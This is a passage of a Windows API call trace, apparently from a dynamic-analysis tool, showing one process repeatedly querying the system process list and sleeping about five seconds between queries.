[0113.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.292] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.329] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.338] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.354] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.372] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.386] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.402] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.416] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.433] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.448] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.464] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.479] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.494] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.511] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.526] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.542] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.559] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.573] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.594] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.604] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0113.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0113.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0113.622] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0113.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0113.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0113.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0113.633] 